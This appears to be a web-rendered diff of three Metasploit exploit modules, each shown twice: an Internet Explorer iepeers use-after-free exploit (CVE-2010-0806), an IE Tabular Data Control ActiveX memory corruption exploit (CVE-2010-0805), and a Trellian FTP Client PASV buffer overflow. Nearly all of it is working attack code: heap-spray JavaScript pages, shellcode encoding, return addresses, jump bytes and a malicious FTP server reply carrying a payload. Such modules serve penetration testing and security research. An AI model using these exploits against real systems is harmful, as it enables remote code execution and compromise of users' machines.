discovered being used in-the-wild and was previously known as the "iepeers"
|
||||
vulnerability. The name comes from Microsoft's suggested workaround to block
|
||||
access to the iepeers.dll file.
|
||||
|
||||
According to Nico Waisman, "The bug itself is when trying to persist an object
|
||||
using the setAttribute, which end up calling VariantChangeTypeEx with both the
|
||||
source and the destination being the same variant. So if you send as a variant
|
||||
an IDISPATCH the algorithm will try to do a VariantClear of the destination before
|
||||
using it. This will end up on a call to PlainRelease which deref the reference
|
||||
and clean the object."
|
||||
|
||||
NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'unknown', # original discovery
|
||||
'Trancer <mtrancer[at]gmail.com>', # metasploit module
|
||||
'Nanika', # HIT2010 IE7 reliable PoC
|
||||
'jduck' # minor cleanups
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-0806' ],
|
||||
[ 'OSVDB', '62810' ],
|
||||
[ 'BID', '38615' ],
|
||||
[ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
|
||||
[ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ],
|
||||
[ 'URL', 'http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html' ],
|
||||
[ 'MSB', 'MS10-018' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'InitialAutoRunScript' => 'migrate -f',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00\x09\x0a\x0d'\\",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ '(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista',
|
||||
{
|
||||
'Method' => 'automatic'
|
||||
}
|
||||
],
|
||||
|
||||
[ 'IE 6 SP0-SP2 (onclick)',
|
||||
{
|
||||
'Method' => 'onclick',
|
||||
'Ret' => 0x0C0C0C0C
|
||||
}
|
||||
],
|
||||
|
||||
# "A great celebration of HIT2010" - http://www.hitcon.org/
|
||||
[ 'IE 7.0 (marquee)',
|
||||
{
|
||||
'Method' => 'marquee',
|
||||
'Ret' => 0x0C0C0C0C
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Mar 09 2010',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
|
||||
def auto_target(cli, request)
|
||||
mytarget = nil
|
||||
|
||||
agent = request.headers['User-Agent']
|
||||
#print_status("Checking user agent: #{agent}")
|
||||
if agent =~ /Windows NT 6\.0/
|
||||
mytarget = targets[2] # IE7 on Vista
|
||||
elsif agent =~ /MSIE 7\.0/
|
||||
mytarget = targets[2] # IE7 on XP and 2003
|
||||
elsif agent =~ /MSIE 6\.0/
|
||||
mytarget = targets[1] # IE6 on NT, 2000, XP and 2003
|
||||
else
|
||||
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
|
||||
end
|
||||
|
||||
mytarget
|
||||
end
|
||||
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
if target['Method'] == 'automatic'
|
||||
mytarget = auto_target(cli, request)
|
||||
if (not mytarget)
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
else
|
||||
mytarget = target
|
||||
end
|
||||
|
||||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
|
||||
|
||||
# Encode the shellcode
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))
|
||||
|
||||
# Set the return\nops
|
||||
ret = Rex::Text.to_unescape([mytarget.ret].pack('V'))
|
||||
|
||||
# Randomize the javascript variable names
|
||||
j_shellcode = rand_text_alpha(rand(100) + 1)
|
||||
j_nops = rand_text_alpha(rand(100) + 1)
|
||||
j_slackspace = rand_text_alpha(rand(100) + 1)
|
||||
j_fillblock = rand_text_alpha(rand(100) + 1)
|
||||
j_memory = rand_text_alpha(rand(100) + 1)
|
||||
j_counter = rand_text_alpha(rand(30) + 2)
|
||||
j_ret = rand_text_alpha(rand(100) + 1)
|
||||
j_array = rand_text_alpha(rand(100) + 1)
|
||||
j_function1 = rand_text_alpha(rand(100) + 1)
|
||||
j_function2 = rand_text_alpha(rand(100) + 1)
|
||||
j_object = rand_text_alpha(rand(100) + 1)
|
||||
j_id = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
# Construct the final page
|
||||
case mytarget['Method']
|
||||
|
||||
when 'onclick'
|
||||
html = %Q|<html><body>
|
||||
<button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
|
||||
<script language='javascript'>
|
||||
function #{j_function1}(){
|
||||
var #{j_shellcode} = unescape('#{shellcode}');
|
||||
#{j_memory} = new Array();
|
||||
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
|
||||
var #{j_nops} = unescape('#{ret}');
|
||||
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
|
||||
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
|
||||
delete #{j_nops};
|
||||
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
|
||||
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
|
||||
}
|
||||
}
|
||||
function #{j_function2}(){
|
||||
#{j_function1}();
|
||||
var #{j_object} = document.createElement('body');
|
||||
#{j_object}.addBehavior('#default#userData');
|
||||
document.appendChild(#{j_object});
|
||||
try {
|
||||
for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
|
||||
#{j_object}.setAttribute('s',window);
|
||||
}
|
||||
} catch(e){ }
|
||||
window.status+='';
|
||||
}
|
||||
|
||||
document.getElementById('#{j_id}').onclick();
|
||||
</script></body></html>
|
||||
|
|
||||
|
||||
when 'marquee'
|
||||
j_attrib = rand_text_alpha(6);
|
||||
html = %Q|<html>
|
||||
<head>
|
||||
<style type="text/css">
|
||||
.#{j_object} {behavior: url(#default#userData);}
|
||||
</style>
|
||||
</head>
|
||||
<script>
|
||||
function #{j_function1}(){
|
||||
var #{j_shellcode} = unescape('#{shellcode}');
|
||||
#{j_memory} = new Array();
|
||||
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
|
||||
var #{j_nops} = unescape('#{ret}');
|
||||
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
|
||||
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
|
||||
delete #{j_nops};
|
||||
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
|
||||
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
|
||||
}
|
||||
}
|
||||
function #{j_function2}() {
|
||||
#{j_function1}();
|
||||
for (#{j_counter} = 1; #{j_counter} <10; #{j_counter} ++ ){
|
||||
#{j_id}.setAttribute("#{j_attrib}",document.location);
|
||||
}
|
||||
#{j_id}.setAttribute("#{j_attrib}",document.getElementsByName("style"));
|
||||
document.location="about:\\u0c0c\\u0c0c\\u0c0c\\u0c0cblank";
|
||||
}
|
||||
</script>
|
||||
<body onload="#{j_function2}();"></body>
|
||||
<MARQUEE id="#{j_id}" class="#{j_object}"></MARQUEE>
|
||||
</html>
|
||||
|
|
||||
|
||||
end
|
||||
|
||||
# Transmit the compressed response to the client
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
|
||||
# Handle the payload
|
||||
handler(cli)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -1,123 +1,123 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Internet Explorer Tabular Data Control ActiveX Memory Corruption',
|
||||
'Description' => %q{
|
||||
This module exploits a memory corruption vulnerability in the Internet Explorer
|
||||
Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet
|
||||
Explorer are vulnerable.
|
||||
|
||||
By specifying a long value as the "DataURL" parameter to this control, it is possible
|
||||
to write a NUL byte outside the bounds of an array. By targeting control flow data
|
||||
on the stack, an attacker can execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Anonymous', # original discovery
|
||||
'jduck' # metasploit version
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-0805' ],
|
||||
[ 'OSVDB', '63329' ],
|
||||
[ 'BID', '39025' ],
|
||||
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-034' ],
|
||||
[ 'MSB', 'MS10-018' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'InitialAutoRunScript' => 'migrate -f',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "", #"\x00\x09\x0a\x0d'\\",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic (Heap Spray)',
|
||||
{
|
||||
'Ret' => 0x0c0c0c0c
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Mar 09 2010',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{target.name})...")
|
||||
|
||||
# Encode the shellcode
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
||||
|
||||
# Set the return\nops
|
||||
ret = Rex::Text.to_unescape([target.ret].pack('V'))
|
||||
|
||||
# ActiveX parameters
|
||||
#progid =
|
||||
clsid = "333C7BC4-460F-11D0-BC04-0080C7055A83"
|
||||
|
||||
# exploit url
|
||||
url = "http://"
|
||||
#url << rand_text_alphanumeric(258)
|
||||
url << rand_text_alphanumeric(258+0x116+2)
|
||||
|
||||
# Construct the final page
|
||||
var_unescape = rand_text_alpha(rand(100) + 1)
|
||||
var_shellcode = rand_text_alpha(rand(100) + 1)
|
||||
var_memory = rand_text_alpha(rand(100) + 1)
|
||||
var_spray = rand_text_alpha(rand(100) + 1)
|
||||
var_i = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
html = %Q|<html><body>
|
||||
<script>
|
||||
var #{var_memory} = new Array();
|
||||
var #{var_unescape} = unescape;
|
||||
var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
|
||||
var #{var_spray} = #{var_unescape}("#{ret * 2}");
|
||||
do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0x4000 );
|
||||
for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
|
||||
</script>
|
||||
<object classid='clsid:#{clsid}'>
|
||||
<param name='DataURL' value='#{url}'/>
|
||||
</object>
|
||||
</body></html>
|
||||
|
|
||||
|
||||
# Transmit the compressed response to the client
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
|
||||
# Handle the payload
|
||||
handler(cli)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Internet Explorer Tabular Data Control ActiveX Memory Corruption',
|
||||
'Description' => %q{
|
||||
This module exploits a memory corruption vulnerability in the Internet Explorer
|
||||
Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet
|
||||
Explorer are vulnerable.
|
||||
|
||||
By specifying a long value as the "DataURL" parameter to this control, it is possible
|
||||
to write a NUL byte outside the bounds of an array. By targeting control flow data
|
||||
on the stack, an attacker can execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Anonymous', # original discovery
|
||||
'jduck' # metasploit version
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-0805' ],
|
||||
[ 'OSVDB', '63329' ],
|
||||
[ 'BID', '39025' ],
|
||||
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-034' ],
|
||||
[ 'MSB', 'MS10-018' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'InitialAutoRunScript' => 'migrate -f',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "", #"\x00\x09\x0a\x0d'\\",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic (Heap Spray)',
|
||||
{
|
||||
'Ret' => 0x0c0c0c0c
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Mar 09 2010',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{target.name})...")
|
||||
|
||||
# Encode the shellcode
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
||||
|
||||
# Set the return\nops
|
||||
ret = Rex::Text.to_unescape([target.ret].pack('V'))
|
||||
|
||||
# ActiveX parameters
|
||||
#progid =
|
||||
clsid = "333C7BC4-460F-11D0-BC04-0080C7055A83"
|
||||
|
||||
# exploit url
|
||||
url = "http://"
|
||||
#url << rand_text_alphanumeric(258)
|
||||
url << rand_text_alphanumeric(258+0x116+2)
|
||||
|
||||
# Construct the final page
|
||||
var_unescape = rand_text_alpha(rand(100) + 1)
|
||||
var_shellcode = rand_text_alpha(rand(100) + 1)
|
||||
var_memory = rand_text_alpha(rand(100) + 1)
|
||||
var_spray = rand_text_alpha(rand(100) + 1)
|
||||
var_i = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
html = %Q|<html><body>
|
||||
<script>
|
||||
var #{var_memory} = new Array();
|
||||
var #{var_unescape} = unescape;
|
||||
var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
|
||||
var #{var_spray} = #{var_unescape}("#{ret * 2}");
|
||||
do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0x4000 );
|
||||
for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
|
||||
</script>
|
||||
<object classid='clsid:#{clsid}'>
|
||||
<param name='DataURL' value='#{url}'/>
|
||||
</object>
|
||||
</body></html>
|
||||
|
|
||||
|
||||
# Transmit the compressed response to the client
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
|
||||
# Handle the payload
|
||||
handler(cli)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -1,93 +1,93 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::TcpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Trellian FTP Client 3.01 PASV Remote Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered
|
||||
through an excessively long PASV message.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'zombiefx', # Original exploit author
|
||||
'dookie' # MSF module author
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/12152' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'seh',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 900,
|
||||
'BadChars' => "\x00\x29\x2c\x2e",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP Universal', { 'Ret' => "\xfd\x21\x40" } ], # 0x004021fd p/p/r in ftp.exe
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'April 11 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def on_client_connect(client)
|
||||
return if ((p = regenerate_payload(client)) == nil)
|
||||
|
||||
# Let the client log in
|
||||
client.get_once
|
||||
|
||||
user = "331 Please specify the password.\r\n"
|
||||
client.put(user)
|
||||
|
||||
client.get_once
|
||||
pass = "230 Login successful.\r\n"
|
||||
client.put(pass)
|
||||
|
||||
# Handle the clients PWD command
|
||||
client.get_once
|
||||
pwd = "257 \"/\" is current directory.\r\n"
|
||||
client.put(pwd)
|
||||
client.get_once
|
||||
|
||||
sploit = "227 Entering Passive Mode ("
|
||||
sploit << rand_text_alpha_upper(2171)
|
||||
sploit << make_nops(100)
|
||||
sploit << payload.encoded
|
||||
sploit << make_nops(900 - (payload.encoded.length))
|
||||
sploit << "\xe9\x18\xfc\xff\xff" # Jump back 1000 bytes
|
||||
sploit << "\xeb\xf9\x90\x90" # Jump back 7 bytes
|
||||
sploit << [target.ret].pack("A3")
|
||||
sploit << ")\r\n"
|
||||
|
||||
client.put(sploit)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::TcpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Trellian FTP Client 3.01 PASV Remote Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered
|
||||
through an excessively long PASV message.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'zombiefx', # Original exploit author
|
||||
'dookie' # MSF module author
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/12152' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'seh',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 900,
|
||||
'BadChars' => "\x00\x29\x2c\x2e",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP Universal', { 'Ret' => "\xfd\x21\x40" } ], # 0x004021fd p/p/r in ftp.exe
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'April 11 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def on_client_connect(client)
|
||||
return if ((p = regenerate_payload(client)) == nil)
|
||||
|
||||
# Let the client log in
|
||||
client.get_once
|
||||
|
||||
user = "331 Please specify the password.\r\n"
|
||||
client.put(user)
|
||||
|
||||
client.get_once
|
||||
pass = "230 Login successful.\r\n"
|
||||
client.put(pass)
|
||||
|
||||
# Handle the clients PWD command
|
||||
client.get_once
|
||||
pwd = "257 \"/\" is current directory.\r\n"
|
||||
client.put(pwd)
|
||||
client.get_once
|
||||
|
||||
sploit = "227 Entering Passive Mode ("
|
||||
sploit << rand_text_alpha_upper(2171)
|
||||
sploit << make_nops(100)
|
||||
sploit << payload.encoded
|
||||
sploit << make_nops(900 - (payload.encoded.length))
|
||||
sploit << "\xe9\x18\xfc\xff\xff" # Jump back 1000 bytes
|
||||
sploit << "\xeb\xf9\x90\x90" # Jump back 7 bytes
|
||||
sploit << [target.ret].pack("A3")
|
||||
sploit << ")\r\n"
|
||||
|
||||
client.put(sploit)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
File diff suppressed because it is too large
Load Diff
Loading…
Reference in New Issue